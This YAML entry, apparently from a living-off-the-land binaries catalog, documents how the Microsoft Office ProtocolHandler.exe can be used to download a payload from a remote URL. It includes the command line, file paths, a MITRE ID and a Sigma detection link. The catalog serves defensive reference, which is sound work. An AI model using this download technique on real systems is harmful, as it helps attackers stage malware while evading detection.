---
Name: ProtocolHandler.exe
Description: Microsoft Office binary
Author: Nir Chako
Created: 2022-07-24
Commands:
  - Command: ProtocolHandler.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml
  - IOC: Suspicious Office application Internet/network traffic
Acknowledgement:
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'
